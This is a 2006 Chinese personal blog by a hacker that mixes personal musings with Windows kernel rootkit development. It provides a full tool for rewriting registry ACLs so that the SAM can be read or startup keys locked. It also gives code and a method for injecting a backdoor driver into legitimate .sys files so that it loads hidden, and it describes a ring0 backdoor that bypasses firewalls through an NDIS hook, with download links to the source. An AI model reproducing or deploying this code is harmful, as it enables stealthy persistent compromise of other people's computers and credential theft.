2006年10月29日

很久没上blog了,教育网里也登不上. 几个月不见donews的blog成了这个鸟样,小广告也给贴上了,代码也都给我堆到一行上…..

2006年06月09日

爱,只有爱,才是一个男人成功的最好动力、最合适的动力。而绝不是自己的虚荣心,或者所谓的雄心壮志。作为一个男人,首要的一件事是你要有你的真正所爱。它会像原子弹一样激发你的能力,让你爆发无穷的动力,上帝也会为你感动。这样的状态,就是每个人梦寐以求的状态。

没别的,我只是该记住今天,我也希望忘了今天,忘了我为什么要忘了今天

2006年05月10日

以前给朋友弄的,我也忘了怎么用了,在命令行下把注册表的项设成deny|Allow|reAdonly,改了后可以看SAM,也可以让run什么的变成只读的什么的 -____-

grAntAccess2.c

/*********************************************************************
 * Change the DACL of a registry key (grant / deny / read-only for one
 * user or group).  Needs permission to write the key's DACL.
 *                                      writen by uty@uaty
 *********************************************************************/
#include <stdio.h>
#include <windows.h>
#include <winnt.h>
#include <aclapi.h>
#include <accctrl.h>
//#define SPECIFIC_RIGHTS_ALL           0x0000FFFF
//#define STANDARD_RIGHTS_REQUIRED      0x000F0000
//#define STANDARD_RIGHTS_ALL           0x001F0000

/* Enables one named privilege on the current process token; 0 on success, -1 on failure. */
int getprivilege(LPCTSTR  privilege);

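/* Access mask denied by READONLY, kept from the original: KEY_SET_VALUE (0x2)
 * and KEY_CREATE_SUB_KEY (0x4) plus the upper byte of the specific rights
 * (0xFF00).  Query value, enumerate sub keys, notify and create link remain
 * allowed — see the KEY_* values in winnt.h. */
enum { READONLY_DENY_MASK = 0xFF06 };

/*
 * grAntAccess2 registrypAth USER|GROUP name deny|Allow|reAdonly
 *
 * Rewrites the DACL of one registry key: every existing ACE for the given
 * account is removed, then a single ACE is added (GRANT_ACCESS with all
 * specific rights, DENY_ACCESS with all specific rights, or DENY_ACCESS with
 * READONLY_DENY_MASK).  Returns 0 on success, -1 when a security API fails,
 * 1 on bad keyword arguments.
 *
 * Ownership: pSecurityDescriptor comes from GetNamedSecurityInfo and pNewAcl
 * from SetEntriesInAcl; both are LocalFree'd on every exit path (the original
 * freed an uninitialised pointer when GetNamedSecurityInfo failed and never
 * freed pNewAcl).  pAcl points into pSecurityDescriptor and is not freed.
 */
int main(int Argc, char *Argv[])
{
	int						rc = -1;
	DWORD					ret;
	PSECURITY_DESCRIPTOR	pSecurityDescriptor = NULL;
	PACL					pAcl = NULL;
	PACL					pNewAcl = NULL;
	EXPLICIT_ACCESS			eA;
	char					*user_groupnAme;
	char					*keypAth;
	char					sid[64];
	DWORD					sidlen = sizeof sid;
	char					siddomAin[128];
	DWORD					siddomAinlen = sizeof siddomAin;
	SID_NAME_USE			sidtype;
	TRUSTEE_TYPE			trusteeType;
	LPVOID					pAce = NULL;	/* GetAce hands back a pointer; the original stored it in a DWORD */
	DWORD					Aceindex = 0;

	if (Argc != 5) {
		printf("// grAntAccess2.exe\n");
		printf("//  uty@uaty\n");
		printf("usAge:\n");
		printf("      grAntAccess2.exe registrypAth USER|GROUP  usernAme|groupnAme  deny|Allow|reAdonly\n");
		printf(
			"   registerpAth: like this MACHINE\\SECURITY....\n"
			"   predefined registry keys:\"CLASSES_ROOT\", \"CURRENT_USER\", \"MACHINE\", and \"USERS\"\n"
			"eg:\n"
			"   grAntAccess2.exe MACHINE\\SAM\\SAM USER uty Allow\n"
			"   grAntAccess2.exe MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run USER uty reAdonly\n"
			);
		return 0;
	}

	keypAth			= Argv[1];
	user_groupnAme	= Argv[3];

	/* Validate both keyword arguments before touching any security API
	 * (the original parsed USER|GROUP twice, after the key had been read). */
	if (stricmp(Argv[2], "GROUP") == 0) {
		trusteeType = TRUSTEE_IS_GROUP;
	} else if (stricmp(Argv[2], "USER") == 0) {
		trusteeType = TRUSTEE_IS_USER;
	} else {
		printf(" ?? ,USER or GROUP\n");
		return 1;
	}

	memset(&eA, 0, sizeof eA);
	if (stricmp(Argv[4], "ALLOW") == 0) {
		eA.grfAccessMode		= GRANT_ACCESS;
		eA.grfAccessPermissions	= SPECIFIC_RIGHTS_ALL;
	} else if (stricmp(Argv[4], "DENY") == 0) {
		eA.grfAccessMode		= DENY_ACCESS;
		eA.grfAccessPermissions	= SPECIFIC_RIGHTS_ALL;
	} else if (stricmp(Argv[4], "READONLY") == 0) {
		/* "read only" is expressed as a deny ACE on the write-type rights */
		eA.grfAccessMode		= DENY_ACCESS;
		eA.grfAccessPermissions	= READONLY_DENY_MASK;
	} else {
		printf(" ?? , ALLOW or DENY or READONLY\n");
		return 1;
	}

	/* Best effort, as in the original: getprivilege prints its own failures and
	 * the result is otherwise ignored (the author noted the effect was unclear
	 * but the outcome was fine). */
	getprivilege(SE_SECURITY_NAME);
	getprivilege(SE_RESTORE_NAME);
	getprivilege(SE_BACKUP_NAME);
	getprivilege(SE_TAKE_OWNERSHIP_NAME);
	getprivilege(SE_DEBUG_NAME);

	/* Read the current DACL; GetNamedSecurityInfo returns the error code itself. */
	ret = GetNamedSecurityInfo(keypAth, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
							   NULL, NULL, &pAcl, NULL, &pSecurityDescriptor);
	if (ret != ERROR_SUCCESS) {
		printf("GetNAmedSecurityInfo fAiled: %lu\n  ret %lu\n", GetLastError(), ret);
		goto cleanup;
	}

	/* Resolve the account name to a SID; sidtype is an output of the lookup. */
	ret = LookupAccountName(NULL, user_groupnAme, sid, &sidlen, siddomAin, &siddomAinlen, &sidtype);
	if (ret == 0) {
		printf("LookupAccountNAme fAiled: %lu\n sid size if %lu\nsidlen requres %lu\n\n",
			   GetLastError(), (unsigned long)sizeof(SID), (unsigned long)sidlen);
		goto cleanup;
	}

	/* Drop every existing ACE for the same SID so the new one is the only entry
	 * for this account.  A NULL DACL (everyone has full access) has nothing to
	 * walk and SetEntriesInAcl accepts a NULL old ACL.  The index is not advanced
	 * after DeleteAce because the next ACE moves into the deleted slot.  The SID
	 * is read at the offset shared by ACCESS_ALLOWED_ACE and ACCESS_DENIED_ACE
	 * (header + mask); object ACEs have a different layout and are not handled. */
	while (pAcl != NULL && GetAce(pAcl, Aceindex, &pAce)) {
		PSID AceSid = (PSID)((PBYTE)pAce + sizeof(ACE_HEADER) + sizeof(ACCESS_MASK));
		if (EqualSid((PSID)sid, AceSid)) {
			DeleteAce(pAcl, Aceindex);
		} else {
			Aceindex++;
		}
	}

	eA.grfInheritance						= CONTAINER_INHERIT_ACE;
	eA.Trustee.MultipleTrusteeOperation		= NO_MULTIPLE_TRUSTEE;
	eA.Trustee.pMultipleTrustee				= NULL;
	eA.Trustee.TrusteeForm					= TRUSTEE_IS_NAME;
	eA.Trustee.TrusteeType					= trusteeType;
	eA.Trustee.ptstrName					= user_groupnAme;

	/* pNewAcl is a fresh allocation; the old pAcl stays inside pSecurityDescriptor. */
	ret = SetEntriesInAcl(1, &eA, pAcl, &pNewAcl);
	if (ret != ERROR_SUCCESS) {
		printf("SetEntriesInAcl fAiled: %lu\n ", ret);
		goto cleanup;
	}

	ret = SetNamedSecurityInfo(keypAth, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pNewAcl, NULL);
	if (ret != ERROR_SUCCESS) {
		printf("SetNAmedSecurityInfo fAiled: %lu\n ", ret);
		goto cleanup;
	}

	rc = 0;

cleanup:
	LocalFree(pNewAcl);				/* LocalFree(NULL) is a no-op */
	LocalFree(pSecurityDescriptor);
	return rc;
}
//--------------------------------------------------------------------
/*
 * Enable one privilege (e.g. SE_RESTORE_NAME) on the current process token.
 * Returns 0 on success, -1 on failure (a message is printed).  Only
 * TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY is requested — all that
 * AdjustTokenPrivileges needs — instead of TOKEN_ALL_ACCESS, and the token
 * handle is closed on every path (the original leaked it).
 */
int getprivilege(LPCTSTR  privilege)
{
	HANDLE				hProcessToken = NULL;
	TOKEN_PRIVILEGES	tp;
	LUID				luid;
	int					rc = -1;

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hProcessToken)) {
		printf("\nOpen Current Process Token fAiled:%lu", GetLastError());
		return -1;
	}

	/* look up the LUID of the named privilege */
	if (!LookupPrivilegeValue(NULL, privilege, &luid)) {
		printf("\nLookupPrivilegeVAlue error:%lu", GetLastError());
		goto out;
	}

	tp.PrivilegeCount			= 1;	/* one privilege to set */
	tp.Privileges[0].Luid		= luid;
	tp.Privileges[0].Attributes	= SE_PRIVILEGE_ENABLED;

	/* AdjustTokenPrivileges can return TRUE and still leave the privilege
	 * disabled: when the token does not hold it, GetLastError() reports
	 * ERROR_NOT_ALL_ASSIGNED, so the return value and the error are both checked. */
	if (!AdjustTokenPrivileges(hProcessToken, FALSE, &tp, sizeof tp, NULL, NULL)
		|| GetLastError() != ERROR_SUCCESS) {
		printf("AdjustTokenPrivileges fAiled:%lu\n", GetLastError());
		goto out;
	}

	rc = 0;
out:
	CloseHandle(hProcessToken);
	return rc;
}
//--------------------------------------------------------------------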

 

 

      拿几个vmwAre的sys开了刀,都是stArt=2的,,成功的有,不成功的也有,比如用vmnetuserif.sys 和vmnetbrige.sys注入后门的sys,开机后后门启动,原sys的功能正常.现在最主要的问题就是不稳定了,还不能用在实际的后门中,,哎,编译原理课没去上,也没看,,用的都是自己的土方法 -___-   系统的sys还不能动,因为加载的时候会检查,如果单单是检查IAT就好办了,但感觉除非工作的完全像linker那样准确,否则就不能用.其实要作为后门启动,直接来在注册表中找个地方就行,,那么多地方谁挨个数啊,线程随机选择进程注入,启动项随机选个位置

     说白了还是自己的能力不够,程序编的不好,在ring0下马上就暴露出问题.

     yumen,工作没谈成,程序不好用,生活中失落,这个blog也不好用…  低谷

2006年04月11日

这是前很久想到的,直到前2天才把程序弄出个大概的样子

    在弄后门的时候想到的启动方法就是感染内核文件ntoskrnl.exe ,后来觉得这里一定是众矢之的,而且不
能在它加载之前加载,而是要选中里面的一个时间,都比较烦.后来改感染驱动程序.这样对我的后门来说解决了
三个问题:文件的存放,启动,隐藏内核模块,当然驱动加载的方式也变了
    把两个.sys文件合并成一个,把injectfile中的 .text .data .rdata提出来加入到originalfile
中(这里要求inject file 代码段和数据段只有.text .data,为了简单) 然后把两个文件需要用到的API都
挑出来重新合并成import directory及IAT,,然后由原来两个文件的.reloc来建立新的.reloc,,这些都是很
无聊的工作 -___- 越来越觉得自己像打字员了. 在创建的新文件中把程序入口设成inject file的
DriverEntry,,然后在这里面再调用original file的DriverEntry,  嘿嘿,这样当originalfile也就是被
感染的驱动的时候就会先调用我们的注入的驱动,当然显示出来的内核模块就没注入驱动的事儿了 :p  
实验的是把后门的驱动插入到一个helloworld驱动里
被感染驱动
#include <ntddk.h>
int i;	/* file-scope counter printed by DriverEntry; as a global it is zero-initialised unless something else writes it */
/* Unload routine installed by DriverEntry; there is nothing to tear down. */
VOID OnUnloAd( IN PDRIVER_OBJECT DriverObject )
{
	UNREFERENCED_PARAMETER(DriverObject);
}
//--------------------------------------------------------------------
/* Entry point of the hello-world host driver: prints the file-scope counter
 * `i` and registers OnUnloAd as the unload routine.  Always succeeds. */
NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{
	UNREFERENCED_PARAMETER(RegistryPath);

	DbgPrint("inject SYS %d\n",i);
	DriverObject->DriverUnload = OnUnloAd;

	return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
只打印一句话,用到了一个变量
 
要插入的驱动的DriverEntry函数
//--------------------------------------------------------------------
/* Signature of a driver's DriverEntry; used below to call the host driver's
 * original entry point through a plain address. */
typedef NTSTATUS (*DRIVERENTRY)(
			IN PDRIVER_OBJECT DriverObject,
			IN PUNICODE_STRING RegistryPath
			);

/* Placeholder values.  DriverEntry below subtracts fAkeDriverEntryOffset from
 * the runtime address of its `bAck` label and adds the page-masked difference
 * to reAlDriverEntry before calling through it.  Presumably the merge tool
 * described in the post patches both values into the output file — TODO
 * confirm; as written here they are only markers. */
ULONG	fAkeDriverEntryOffset		= 0x87654321;
ULONG	reAlDriverEntry				= 0x12345678;

//--------------------------------------------------------------------

/*
 * DriverEntry of the driver that was merged into the host (see the post
 * above).  The loader calls this instead of the host's entry: it locates
 * itself in memory, chains to the host's original DriverEntry so the host
 * keeps working, then starts its own system thread.
 *
 * For detection purposes: a DriverEntry that fetches its own address with a
 * call/pop pair and then calls a second entry point through a patched global
 * is the recognisable shape of this kind of merged driver.
 */
NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{

	NTSTATUS	stAtus;
	HANDLE		hThreAd;

	ULONG		bAse;
	/* Position-independent "where am I": `call forwArd` pushes the address of
	 * bAck, forwArd jumps straight back there, and `pop bAse` takes that pushed
	 * address off the stack.  bAse is therefore the runtime address of bAck. */
	__asm{
		call forwArd;
bAck:
		pop bAse;
		jmp outofthis
forwArd:
		jmp bAck
	}
outofthis:

	DbgPrint("Driver begin!\n");

	//__asm int 3;
	DbgPrint("bAse: 0x%x\n",bAse);
	/* fAkeDriverEntryOffset is presumably the address assumed for bAck when the
	 * file was built (TODO confirm); the page-masked difference to the real
	 * bAse is the load delta, applied to the stored address of the host's entry. */
	reAlDriverEntry = reAlDriverEntry + ((bAse - fAkeDriverEntryOffset) & 0xFFFFF000);

	DriverObject->DriverUnload = OnUnloAd;

	DbgPrint("reAlDriverEntry: 0x%x\n",reAlDriverEntry);

	/* Run the host driver's original entry first; its status is not checked. */
	((DRIVERENTRY)reAlDriverEntry)(DriverObject,RegistryPath);

	/* InitWorkThreAd is defined elsewhere in the injected driver (not shown here). */
	stAtus = PsCreateSystemThread(&hThreAd,
									(ACCESS_MASK)0,
									NULL,
									(HANDLE)0,
									NULL,
									InitWorkThreAd,
									DriverObject
									);

	if (!NT_SUCCESS(stAtus)){
		DbgPrint("error when creAte the threAd\n");
		/* NOTE(review): FALSE is 0, which is also STATUS_SUCCESS, so this
		 * failure path still reports success to the loader. */
		return FALSE;
	}

	return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
  加载被感染驱动后显示
Driver begin!
bAse: 0xf7e4d29f
reAlDriverEntry: 0xf7e4b313
inject SYS 0                    <————————— 被感染驱动的DriverEntry被调用
listening on port 9929wAit on ksemSendListSemAphore
miniport->PAcketIndicAteHAndler: f9d35480
our PAcketIndicAteHAndler f7e4cdf4
后门正常工作
 
    郁闷的是本想感染些系统级的sys,,试了两个acpi.sys和watchdog.sys(不知道是不是系统级的,反正一
开机就有了),,结果一启动就直接check了 ,,也没深究是不是自己合并文件合并的不好,看起来错误不是那么
简单,,哎 自己对系统知道的实在是太少了,,,    
    这只是个思路吧,证明这种方式还是可行的,另外加载驱动也只需要能够修改文件的权限(不过好像和加载驱动一样都要是Administrator -___- )    系统开机时加载驱动的过程还不了解,目前还未成功,,插入驱动的加载要足够晚,因为系统刚起来的时候很多功能都还没有.  可以想象感染某个防火墙或杀毒软件的驱动 ;p
    这段时间算是彻底被这个程序弄郁闷了,,,又上了3k行,,, 以后再慢慢改进好了 :(      有弄linker的感觉,现在要是有俩obj说不定我还真就给弄成个exe了 :|
    可以考虑弄个ring0的病毒,专门感染sys,我不了解病毒,不过ntoskrnl加载的位置一般都固定,所以可以在pe的影象里找API,,, 不过这样就要用汇编了 -___-  而合并两个驱动的好处就是可以用c并且基本上不改变这2个驱动,编写复杂点的东西的时候就方便了
    by the wAy,, .reloc真是个好东西 :>   
2006年03月30日

#include <stdio.h>
#include <windows.h>

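/*
 * Demonstrates the text-mode newline translation of fopen("w+") on Windows:
 * the 0x0A written at buffer[1] is expanded on output, so ftell reports one
 * byte more than strlen(buffer) after the write (0xf vs 0xe in the post).
 * Opening with "w+b" would give the raw byte count.  The mode is deliberately
 * left as "w+" so the program still reproduces the effect.
 *
 * Fixes over the original: int main, fopen/fwrite/fclose results checked, the
 * file is closed, and the format specifiers match the argument types
 * (strlen returns size_t, ftell returns long).
 */
int main( void )
{
	FILE*	pFile;
	char	buffer[15] = {"sdfsdfsdfdfsdf"};

	pFile = fopen("tempfile","w+");
	if (pFile == NULL) {
		perror("fopen");
		return 1;
	}
	buffer[1] = 0x0A;

	printf("strlen(buffer): 0x%x\n", (unsigned)strlen(buffer));
	printf("ftell 0x%lx \n", ftell(pFile));
	if (fwrite(buffer, strlen(buffer), 1, pFile) != 1) {
		perror("fwrite");
	}
	printf("ftell 0x%lx \n", ftell(pFile));

	/* fclose flushes; a failed flush on a write stream is only reported here */
	if (fclose(pFile) != 0) {
		perror("fclose");
		return 1;
	}
	return 0;
}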
//--------------------------------------------------------------------

结果:

strlen(buffer): 0xe
ftell 0x0
ftell 0xf

还以为见鬼了,郁闷了我很久,后来才发现pFile = fopen("tempfile","w+");  -____-

没按2进制模式,把0x0A当回车了,,应该是"w+b",,,一个类似的错误加在一大段程序里了,,,郁闷了很久才找到

2006年03月24日

爱情有时候就像一个spinlock,当自己只有一颗芯的时候,需要另一颗芯来解开它.没学会preemption,结果就是……

2006年03月15日
找隐藏进程的方法很多,系统中有那么多个链表把进程们连在一起.所以隐藏进程总觉得太不划算了

    搜索virtual memory这个方法比较懒,本想从NonPagedPool分配出去的内存的链表中找,可他们并不全连在一起,还不怎么了解.偷个懒,没定位几个表示nonpaged位置的变量,直接从头搜到尾了 -____- 留着以后改进
    windbg中!zombies感觉就是在搜nonpaged pool的链表,,找tag是pro的内存块.
    这里搜0x7ffdf000,然后得到eprocess的object header ,判断其中的type是否是process,这两个位置改动都会影响到进程,当然搜其他的地方或者通过别的部分判断也可以.在搜virtual memory的时候先判断pte和pde中的entry是否valid,不分页内存这个位应该总是1,在passive level上访问被置换到page file的内存直接就蓝了,,mm的部分还没搞清楚,,唉…为何是mm都要和我过不去 :“|
    一般进程结束后EPROCESS的peb的部分就变了. 有一回搜出三个csrss.exe,其中有一个是正常的,其他的两个eprocess块也有数据,name的地方也是csrss.exe.object header的PointerCount和HandleCount都不为0.type也是process..很奇怪
 
程序很简单,在虚拟机xp sp1下ok
结果
i'm coming :>
EPROCESS: 0x80d85da8  process nAme: smss.exe
EPROCESS: 0x80e33578  process nAme: csrss.exe
EPROCESS: 0xffad98d8  process nAme: ctfmon.exe
EPROCESS: 0xffae38b8  process nAme: VMwareUser.exe
EPROCESS: 0xffae4850  process nAme: VMwareTray.exe
EPROCESS: 0xffaf0020  process nAme: cmd.exe
EPROCESS: 0xffb0bb88  process nAme: explorer.exe
EPROCESS: 0xffb19da8  process nAme: VMwareService.e
EPROCESS: 0xffb65da8  process nAme: spoolsv.exe
EPROCESS: 0xffb7ada8  process nAme: conime.exe
EPROCESS: 0xffb881c0  process nAme: svchost.exe
EPROCESS: 0xffb90020  process nAme: svchost.exe
EPROCESS: 0xffb9e5d8  process nAme: svchost.exe
EPROCESS: 0xffbaeda8  process nAme: svchost.exe
EPROCESS: 0xffbc3020  process nAme: lsass.exe
EPROCESS: 0xffbcf2a0  process nAme: services.exe
EPROCESS: 0xffbd19f8  process nAme: winlogon.exe
seArching finish
哦,没有0,4号进程
回找到重复的进程,就像csrss.exe那样的……还不清楚是那些是干什么的

//findprocess.c
//		by uty@uaty
//
// Finds processes by brute force instead of walking any kernel list: kernel
// virtual memory is scanned for the fixed PEB address and each hit is checked
// against the object-header type of a known process.  All offsets below are
// hard-coded for the XP SP1 build the author tested (see the post above) and
// must be re-checked for any other build.
#include <ntddk.h>

// return codes of vAlidpAge()
#define PDE_INVALID 2			// page-directory entry not present: the 4MB region is unmapped
#define PTE_INVALID 1			// page-table entry not present: the 4k page is unmapped
#define VALID		0			// page is mapped and can be read

#define PEB_OFFSET					0x1b0	// EPROCESS field holding the PEB pointer (the value searched for)
#define OBJECT_HEADER_SIZE			0x18	// the OBJECT_HEADER sits this far in front of the EPROCESS body
#define OBJECT_TYPE_OFFSET			0x8		// offset of the type pointer inside OBJECT_HEADER
#define EPROCESS_NAME_OFFSET		0x174	// offset of the image-name string inside EPROCESS

VOID WorkThreAd(IN PVOID pContext);
VOID DriverUnloAd(IN PDRIVER_OBJECT Driver_object);
VOID seArchprocess(VOID);
VOID getnAme(ULONG Addr);
ULONG vAlidpAge(ULONG Addr);
BOOLEAN IsAReAlProcess(ULONG i);

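/* User-mode address of the PEB on the tested XP build; an EPROCESS is
 * recognised by this value sitting at EPROCESS+PEB_OFFSET. */
#define PEB_ADDRESS	0x7ffdf000

static VOID scAnrAnge(ULONG lo, ULONG hi);

/* Driver entry: prints a banner, installs the unload routine and runs the
 * scan on a system thread so DriverEntry returns promptly.  Returns the
 * PsCreateSystemThread status on failure (the original ignored it and
 * reported success) and closes the thread handle, which was leaked before. */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
	NTSTATUS	dwStAtus;
	HANDLE		hThreAd;

	UNREFERENCED_PARAMETER(RegistryPath);

	DbgPrint("i'm coming :>\n");

	DriverObject->DriverUnload = DriverUnloAd;

	dwStAtus = PsCreateSystemThread(&hThreAd,
		(ACCESS_MASK)0,
		NULL,
		(HANDLE)0,
		NULL,
		WorkThreAd,
		NULL
		);
	if (!NT_SUCCESS(dwStAtus)) {
		DbgPrint("PsCreateSystemThread failed: 0x%x\n", dwStAtus);
		return dwStAtus;
	}
	/* the handle is never used again; keeping it open leaks a kernel handle */
	ZwClose(hThreAd);

	return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
/* Nothing to tear down.  NOTE(review): nothing waits for WorkThreAd, so an
 * unload while the scan is still running would pull the code out from under
 * it — the original has the same gap. */
VOID DriverUnloAd(IN PDRIVER_OBJECT Driver_object)
{
	UNREFERENCED_PARAMETER(Driver_object);
}
//--------------------------------------------------------------------
/* System-thread body: run the scan once, then terminate the thread. */
VOID WorkThreAd(IN PVOID pContext)
{
	UNREFERENCED_PARAMETER(pContext);

	seArchprocess();

	PsTerminateSystemThread(STATUS_SUCCESS);
	DbgPrint("Never be here ?\n");
}
//--------------------------------------------------------------------
/* Scan the two kernel ranges the author found process objects in (nonpaged
 * pool lives there on the tested build — TODO confirm for other builds) and
 * print every EPROCESS found.  The duplicated loop body of the original is
 * now a single helper. */
VOID seArchprocess(void)
{
	scAnrAnge(0x80000000, 0x90000000);
	scAnrAnge(0xf0000000, 0xffbe0000);

	DbgPrint("seArching finish \n");
}
//--------------------------------------------------------------------
/* Walk [lo, hi) in 4-byte steps looking for PEB_ADDRESS; every read is gated
 * by vAlidpAge() because touching an unmapped address here is fatal.  When a
 * page or a 4MB region is not present the whole of it is skipped; the skip is
 * relative to the current position, not re-aligned (same as the original). */
static VOID scAnrAnge(ULONG lo, ULONG hi)
{
	ULONG	i = lo;

	while (i < hi) {
		ULONG	result = vAlidpAge(i);

		if (result == VALID) {
			if (*(PULONG)i == PEB_ADDRESS && IsAReAlProcess(i)) {
				DbgPrint("EPROCESS: 0x%x  ", i - PEB_OFFSET);
				getnAme(i);
			}
			i += 4;
		} else if (result == PTE_INVALID) {
			i += 0x1000;	/* 4k page not present: skip it entirely */
		} else {
			i += 0x400000;	/* 4MB directory entry not present: skip the region */
		}
	}
}
//--------------------------------------------------------------------
/* Print the image name stored in the EPROCESS whose PEB field is at Addr. */
VOID getnAme(ULONG Addr)
{
	DbgPrint("process nAme: %s\n", (PCHAR)(Addr - PEB_OFFSET + EPROCESS_NAME_OFFSET));
}
//--------------------------------------------------------------------
/* Classify the page containing Addr by reading the self-mapped x86 (non-PAE)
 * page tables: page-directory entries at 0xc0300000, page-table entries at
 * 0xc0000000 — TODO confirm these hold for the target build.
 * Returns VALID, PTE_INVALID or PDE_INVALID. */
ULONG vAlidpAge(ULONG Addr)
{
	ULONG	pte;
	ULONG	pde;

	pde = 0xc0300000 + (Addr >> 22) * 4;
	if ((*(PULONG)pde & 0x1) == 0) {
		return PDE_INVALID;
	}
	/* bit 7 set: 4MB large page, there is no page table to consult */
	if ((*(PULONG)pde & 0x80) != 0) {
		return VALID;
	}
	pte = 0xc0000000 + (Addr >> 12) * 4;
	return ((*(PULONG)pte & 0x1) != 0) ? VALID : PTE_INVALID;
}
//--------------------------------------------------------------------
/* i is the address holding the PEB pointer, i.e. EPROCESS+PEB_OFFSET.  Reports
 * TRUE when the object header in front of that EPROCESS carries the same type
 * pointer as the current process' own object header.  Both reads are gated by
 * vAlidpAge().  The unused locals of the original were dropped. */
BOOLEAN IsAReAlProcess(ULONG i)
{
	ULONG	pObjectType;
	ULONG	pObjectTypeProcess;
	ULONG	typeAddr;

	pObjectTypeProcess = *(PULONG)((ULONG)PsGetCurrentProcess() - OBJECT_HEADER_SIZE + OBJECT_TYPE_OFFSET);

	if (vAlidpAge(i - PEB_OFFSET) != VALID) {
		return FALSE;
	}

	typeAddr = i - PEB_OFFSET - OBJECT_HEADER_SIZE + OBJECT_TYPE_OFFSET;
	if (vAlidpAge(typeAddr) != VALID) {
		return FALSE;
	}
	pObjectType = *(PULONG)typeAddr;

	return (pObjectTypeProcess == pObjectType) ? TRUE : FALSE;
}
//--------------------------------------------------------------------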

2006年02月17日

hi, i made a backdoor these days, just for learning the skills. so some of the code you may be familiar with :> my english is poor, just read the source
this back door runs in ring0 after it gets started, and bypasses the personal firewall.
first of all, i think hiding a process is a bad idea, many methods can find them out. then i saw IO work items are just what i need. so without creating a process or thread, we have something running in the kernel.

when one command is received, the IO work item gets running; in an IO work item work function call IoQueueWorkItem. it's working but i didn't have time to find out what's going on in IoQueueWorkItem.

Instead of a cmd shell, there are a few commands, like cd dir copy del …. these commands also work in ring0, by using native APIs exported by ntoskrnl.exe. you can add any commands you want, we are in ring0, we can do everything, right?

Second, nowadays xp sp2 and personal firewalls are widely used. So bypassing the firewall becomes a big deal. I use an ndis hook to get the packets. Make two queues, one for received packets, one for the packets to be sent out, and reimplement a simple TCP connection. so the client i chose is netcat. if we make a client by ourselves, it will be more useful and simple.

Third, how to start it. writing the registry is easy to be found, including hooking reg functions and hiding the service item. in my head, i want to infect the kernel, that's right, ntoskrnl.exe, like letting my rootkit be one part of the kernel. i'm still working on it : ( . i found another way instead. not a very good one. it replaces userinit.exe; when the system starts, we first start the rootkit by loading a sys file, then run the real userinit.exe.

usage: "uay.exe -i port" or "uay.exe -i" to install, "uay.exe -u" to uninstall, "nc.exe ip port" to connect to it.

here follows the ring0 part, the whole thing can be downloaded at http://uty.512j.com/uay_source.rar , which includes the fake userinit.exe

………

……..

哎,后面的代码太多了,发不到blog上来,完整的程序可以在这里下载 http://www.xfocus.net/tools/200602/uay_source.rar
改进后的就不知道放哪了 :|

2006年01月28日

当工作和爱情不如意的时候,可以掏出小弟弟,凝视他,静思他所蕴涵之精神——能长能短,能粗能细,能伸能曲,能软能硬,学学他,眼前的困难算个鸟。